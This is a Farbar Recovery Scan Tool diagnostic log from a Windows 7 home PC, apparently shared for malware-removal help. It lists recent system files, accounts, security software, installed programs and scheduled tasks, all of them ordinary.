2016-08-10 23:25 - 2016-08-02 10:54 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-08-10 23:25 - 2016-08-02 02:54 - 25808384 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-08-10 23:25 - 2016-08-02 02:47 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-08-10 23:25 - 2016-08-02 02:32 - 02894336 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-08-10 23:25 - 2016-08-02 02:32 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-08-10 23:25 - 2016-08-02 02:31 - 00572416 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-08-10 23:25 - 2016-08-02 02:31 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-08-10 23:25 - 2016-08-02 02:31 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-08-10 23:25 - 2016-08-02 02:24 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-08-10 23:25 - 2016-08-02 02:20 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-08-10 23:25 - 2016-08-02 02:19 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-08-10 23:25 - 2016-08-02 02:18 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-08-10 23:25 - 2016-08-02 02:18 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-08-10 23:25 - 2016-08-02 02:18 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-08-10 23:25 - 2016-08-02 02:11 - 00969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-08-10 23:25 - 2016-08-02 02:08 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-08-10 23:25 - 2016-08-02 01:56 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-08-10 23:25 - 2016-08-02 01:55 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-08-10 23:25 - 2016-08-02 01:53 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-08-10 23:25 - 2016-08-02 01:51 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-08-10 23:25 - 2016-08-02 01:47 - 02286592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-08-10 23:25 - 2016-08-02 01:45 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-08-10 23:25 - 2016-08-02 01:42 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-08-10 23:25 - 2016-08-02 01:41 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-08-10 23:25 - 2016-08-02 01:41 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-08-10 23:25 - 2016-08-02 01:41 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-08-10 23:25 - 2016-08-02 01:40 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-08-10 23:25 - 2016-08-02 01:38 - 00806400 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-08-10 23:25 - 2016-08-02 01:37 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-08-10 23:25 - 2016-08-02 01:36 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-08-10 23:25 - 2016-08-02 01:33 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-08-10 23:25 - 2016-08-02 01:28 - 15412224 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-08-10 23:25 - 2016-08-02 01:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-08-10 23:25 - 2016-08-02 01:23 - 02868224 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-08-10 23:25 - 2016-08-02 01:21 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-08-10 23:25 - 2016-08-02 01:16 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-08-10 23:25 - 2016-08-02 01:14 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-08-10 23:25 - 2016-08-02 01:14 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-08-10 23:25 - 2016-08-02 01:11 - 13808128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-08-10 23:25 - 2016-08-02 01:10 - 01550848 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-08-10 23:25 - 2016-08-02 00:59 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-08-10 23:25 - 2016-08-02 00:56 - 02393088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-08-10 23:25 - 2016-07-08 11:01 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-07-28 22:15 - 2016-07-28 22:15 - 00000000 ____D C:\Windows\EOONotify
2016-07-27 23:53 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-07-27 23:53 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-07-27 23:53 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-07-27 23:53 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-07-27 23:53 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-07-27 23:53 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-07-27 23:53 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2016-07-27 23:53 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-07-27 23:53 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-07-27 23:53 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-07-27 23:53 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2016-07-27 23:53 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2016-07-27 23:53 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-07-27 23:53 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-07-10 15:26 - 2016-07-10 15:26 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2016-07-09 15:14 - 2016-07-09 15:14 - 06858912 _____ (ESET spol. s r.o.) C:\Users\james\Downloads\esetonlinescanner_enu (1).exe
2016-07-09 11:23 - 2016-09-25 22:35 - 06761600 _____ (ESET spol. s r.o.) C:\Users\james\Downloads\esetonlinescanner_enu.exe
2016-07-08 13:27 - 2016-07-08 13:27 - 00000000 ____D C:\Users\james\AppData\Local\Macromedia

==================== Three Months Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-09-30 12:57 - 2012-12-30 05:01 - 00003926 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{4A93FDEC-C5EA-4C65-8234-08FCE8A3483F}
2016-09-30 12:33 - 2016-05-25 21:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-09-30 12:28 - 2009-07-14 00:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-09-30 12:28 - 2009-07-14 00:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-09-30 12:20 - 2012-04-12 01:23 - 00000000 ____D C:\ProgramData\PDFC
2016-09-30 12:20 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2016-09-30 12:19 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-09-30 10:27 - 2015-07-02 18:58 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-09-29 21:10 - 2016-02-07 14:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForjames
2016-09-29 21:10 - 2016-02-07 14:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForjames.job
2016-09-29 16:12 - 2015-07-01 13:23 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-09-28 18:07 - 2009-07-14 01:13 - 00782470 _____ C:\Windows\system32\PerfStringBackup.INI
2016-09-26 19:45 - 2013-01-22 19:40 - 00083064 _____ C:\Users\james\Documents\Train Inventory.xlsx
2016-09-26 12:55 - 2016-04-01 15:04 - 00000000 ____D C:\AdwCleaner
2016-09-21 10:40 - 2013-09-16 15:23 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-09-21 10:39 - 2013-09-16 15:19 - 00000000 ____D C:\Program Files\Microsoft Office 15

==================== Files in the root of some directories =======

2015-06-28 21:08 - 2015-06-28 21:28 - 0186023 _____ () C:\Users\james\AppData\Local\ars.cache
2015-06-28 21:08 - 2015-06-28 21:28 - 0456971 _____ () C:\Users\james\AppData\Local\census.cache
2015-06-28 17:27 - 2015-06-28 17:27 - 0000036 _____ () C:\Users\james\AppData\Local\housecall.guid.cache
2015-03-11 16:53 - 2015-03-11 16:53 - 0000089 _____ () C:\Users\james\AppData\Local\msmathematics.qat.james
2014-07-02 13:56 - 2014-07-02 13:56 - 0000017 _____ () C:\Users\james\AppData\Local\resmon.resmoncfg
2012-12-30 11:32 - 2012-12-30 11:32 - 0000057 _____ () C:\ProgramData\Ament.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-09-06 20:38

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-09-2016
Ran by [removed] (30-09-2016 13:03:03)
Running from C:\Users\[removed]\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2012-12-30 08:48:54)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-531013560-757715300-2485835200-500 - Administrator - Disabled)
Guest (S-1-5-21-531013560-757715300-2485835200-501 - Limited - Disabled)
james (S-1-5-21-531013560-757715300-2485835200-1000 - Administrator - Enabled) => C:\Users\james

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {768124D7-F5F7-6D2F-DDC2-94DFA4017C95}
AS: Microsoft Security Essentials (Enabled - Up to date) {CDE0C533-D3CD-62A1-E772-AFADDF863628}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.017.20053 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\…\{E1A4C1C6-8030-EFD6-8FAF-DC2B275D490B}) (Version: 3.0.859.0 - Advanced Micro Devices, Inc.)
Atlas Track Planning Software 0.9.29 beta (HKLM-x32\…\AtlasTPS_by_Milen_Peev_is1) (Version: 0.9.29 - Milen Peev)
Blio (HKLM-x32\…\{741006D1-7B2B-4E33-B2B0-831F282EEF64}) (Version: 2.2.8188 - K-NFB Reading Technology, Inc.)
Canon Camera Access Library (HKLM-x32\…\CAL) (Version: 8.1.1.17 - )
Canon Camera Support Core Library (HKLM-x32\…\CSCLIB) (Version: 7.3.1.6 - )
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\…\CameraWindowDVC5) (Version: 5.4.5.17 - )
Canon Camera Window DC_DV 6 for ZoomBrowser EX (HKLM-x32\…\CameraWindowDVC6) (Version: 6.2.0.8 - )
Canon Camera Window MC 6 for ZoomBrowser EX (HKLM-x32\…\CameraWindowMC) (Version: 6.1.0.7 - )
Canon G.726 WMP-Decoder (HKLM-x32\…\Canon G.726 WMP-Decoder) (Version: 1.0.1.3 - )
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\…\MovieEditTask) (Version: 2.2.0.13 - )
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\…\RAW Image Task) (Version: 2.3.0.11 - )
Canon RemoteCapture Task for ZoomBrowser EX (HKLM-x32\…\RemoteCaptureTask) (Version: 1.5.0.5 - )
Canon Utilities ZoomBrowser EX (HKLM-x32\…\ZoomBrowser EX) (Version: 5.6.0.27 - )
CCleaner (HKLM\…\CCleaner) (Version: 4.10 - Piriform)
CyberLink YouCam (HKLM-x32\…\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4417 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
ESET Online Scanner v3 (HKLM-x32\…\ESET Online Scanner) (Version:  - )
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Application Assistant (HKLM\…\{B34A07DD-C6F7-414A-AE63-01019482EAF0}) (Version: 1.0.393.3870 - Hewlett-Packard)
HP Calendar (HKLM-x32\…\{2B38E0FA-D8A5-4EBF-A018-E3C1C8E7A2E2}) (Version: 5.1.4245.23508 - Hewlett-Packard)
HP Clock (HKLM-x32\…\{0EEC4E49-D4C2-4E23-87F2-B5641F1A09E4}) (Version: 5.1.4244.16367 - Hewlett-Packard)
HP Keyboard (HKLM-x32\…\{B40D7926-AE5F-41EA-8AC6-56C0E2F00E9D}) (Version: 1.5.0.4 - Hewlett-Packard)
HP LinkUp (HKLM-x32\…\{7E750542-55BC-4300-8B7B-AC2A762FB435}) (Version: 2.01.029 - Hewlett-Packard)
HP Magic Canvas (HKLM-x32\…\{DDFDC9D6-4220-41F8-BF9A-8E7512C4EF52}) (Version: 5.1.15.0 - Hewlett-Packard)
HP Magic Canvas Tutorials (HKLM-x32\…\{858FCB65-7C6D-4BA4-AD80-A3CB3744CE09}_is1) (Version: 5.0.0.3 - Hewlett-Packard)
HP Notes (HKLM-x32\…\{86BAB08A-5E66-4C53-82E3-C1E91673C7CA}) (Version: 5.1.4274.30382 - Hewlett-Packard)
HP Odometer (HKLM-x32\…\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 4620 series Basic Device Software (HKLM\…\{A2E836B3-59A6-486B-82DC-1EA3878BCDEA}) (Version: 26.0.784.0 - Hewlett-Packard Co.)
HP Officejet 4620 series Help (HKLM-x32\…\{606C37AB-EB04-4270-A592-201A03C2DB36}) (Version: 6.0.0 - Hewlett Packard)
HP Officejet 4620 series Product Improvement Study (HKLM\…\{3CF97AC1-219E-44DA-B3DE-32FCAD606231}) (Version: 26.0.784.0 - Hewlett-Packard Co.)
HP RSS (HKLM-x32\…\{A35E58D6-2A0F-4051-983B-79342081338E}) (Version: 5.1.4301.21494 - Hewlett-Packard)
HP Setup (HKLM-x32\…\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15130.3904 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\…\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.15145.3905 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\…\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\…\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 11.00.0001 - Hewlett-Packard)
HP TouchSmart RecipeBox (HKLM-x32\…\{20714B53-FC73-4F9C-9687-49EB237D6FD7}) (Version: 3.0.3830.27730 - Hewlett-Packard)
HP Update (HKLM-x32\…\{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}) (Version: 5.003.001.001 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\…\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.12.1.0 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\…\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\…\Kobo) (Version: 2.0.3 - Kobo Inc.)
LabelPrint (HKLM-x32\…\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.4507 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.4507 - CyberLink Corp.) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\…\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Metric Converter (HKLM-x32\…\{D0661463-50F7-4A1E-83CB-37CC590589AE}_is1) (Version: 1.0.0.0 - XM Asia Pacific Pte Ltd)
Microsoft .NET Framework 4.5.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Mathematics (HKLM-x32\…\{4D090F70-6F08-4B60-9357-A1DFD4458F09}) (Version: 4.0 - Microsoft Corporation)
Microsoft Office Home and Student 2013 - en-us (HKLM\…\HomeStudentRetail - en-us) (Version: 15.0.4859.1002 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\…\Microsoft Security Client) (Version: 4.9.218.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-531013560-757715300-2485835200-1000\…\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\…\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\…\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\…\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\…\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 49.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\…\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\…\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PDF Complete Special Edition (HKLM-x32\…\PDF Complete) (Version: 4.0.65 - PDF Complete, Inc)
PlayReady PC Runtime amd64 (HKLM\…\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\…\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\…\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.5706 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.5706 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\…\{912CED74-88D3-4C5B-ACB0-132318649765}) (Version: 5.11.0721.0 -  NewspaperDirect Inc.)
Ralink 802.11n Wireless LAN Card (HKLM-x32\…\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 4.0.3.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7404 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\…\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.28099 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.4424 - CyberLink Corp.) Hidden
Remote Graphics Receiver (HKLM-x32\…\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
Skype Click to Call (HKLM-x32\…\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\…\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
TSHostedAppLauncher (x32 Version: 5.1.15.0 - Hewlett-Packard) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\…\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\…\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\…\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\…\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zinio Reader 4 (HKLM-x32\…\ZinioReader4) (Version: 4.2.4164 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.2.4164 - Zinio LLC) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {22852B46-8F0C-4D94-8513-1A0C212197A1} - System32\Tasks\HPCeeScheduleForjames => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {2B4CB5D9-253B-484E-BE04-29BAFBB161E6} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-07-26] (Microsoft Corporation)
Task: {2C309322-D834-437B-9DA0-C6F681F537FF} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-07-26] (Microsoft Corporation)
Task: {5277B290-AA4A-46D0-A3A4-8527082EB17F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-01-21] (Piriform Ltd)
Task: {58295684-8B8F-4624-90AE-88F33720E6A5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {58E3B383-F2AA-4C48-80FF-781C38366113} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {7D93C517-09BD-4FB1-A600-9DCD0EBB088A} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-08-17] (CyberLink)
Task: {980B73F8-226A-4818-B60F-612BA0A8EC59} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {AA8EF2D5-1020-4EEB-90B8-D170FDA8C59C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-07-06] (HP Inc.)
Task: {ACC5775B-B02F-4493-8F21-46B2757F5E9C} - System32\Tasks\HPCustParticipation HP Officejet 4620 series => C:\Program Files\HP\HP Officejet 4620 series\Bin\HPCustPartic.exe [2011-12-18] (Hewlett-Packard Co.)
Task: {F27A003E-279B-4DE2-B8A9-A1B0959128BB} - System32\Tasks\HPOSIAPP64 => C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe [2009-02-27] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleForjames.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

